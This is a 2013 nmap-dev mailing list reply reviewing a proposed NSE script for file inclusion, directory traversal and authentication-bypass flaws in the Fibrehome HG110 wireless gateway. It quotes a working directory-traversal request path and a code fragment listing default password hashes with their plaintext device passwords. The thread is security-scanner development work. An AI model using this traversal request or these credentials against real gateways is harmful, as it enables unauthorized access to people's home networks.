mailing list archives
Re: [NSE] Vulnerabilities in Fibrehome HG110
From: David Fifield <david () bamsoftware com>
Date: Wed, 31 Jul 2013 19:23:32 -0700
On Mon, Jul 08, 2013 at 06:44:24AM -0500, Tom Sellers wrote:
On April 8th, 2011 Zerial ( fernando () zerial org ) published
details of local file inclusion and directory traversal
vulnerabilities in the Fibrehome HG110 wireless gateway. The
documentation below expands upon his findings and provides a technical
writeup of the impacts and vectors of these vulnerabilities. The
attached script serves to provide concrete results from the
Summary: Authentication bypass and complete remote compromise via
HTTPS management interface in the default configuration of the
FiberHome residential wireless gateway.
If the attached script is suitable for inclusion I will rename and commit it.
Thanks, Tom, this looks like a good one.
Is this a typo ("Hareware")?
local _, _, hardware_ver = string.find(resp.body,"var G_HarewareVersion[%s]+= \"([^\"]+)\";")
The script should fail faster if one of its first requests doesn't work.
That is, if "/cgi-bin/webproc?getpage=../../../proc/version&var:menu=advanced&var:page=null"
doesn't work, it shouldn't continue on to try all the other tests.
The script should also not output anything if it didn't find any
information. Currently it's outputting some whitespace or something:
PORT STATE SERVICE
8080/tcp open http-proxy
if hash == '$1$TW$yS.Dzi9LPS3wn0qUQMBEA1' then
hash = hash .. " ( password is support )"
creds_service:add(user, 'support', creds.State.VALID )
elseif hash == '$1$TW$dMolyCCNuy2WxyLJ.zUWv0' then
hash = hash .. " ( password is Need4$MVS.cl )"
creds_service:add(user, 'Need4$MVS.cl', creds.State.VALID )
elseif hash == '$1$TW$FxpXryiZeHo/n5Ad15bYI.' then
hash = hash .. " ( password is M0V15tar$$ )"
creds_service:add(user, 'M0V15tar$$', creds.State.VALID )
You should refactor this to use a hash→password table so as to reduce
Sent through the dev mailing list
Archived at http://seclists.org/nmap-dev/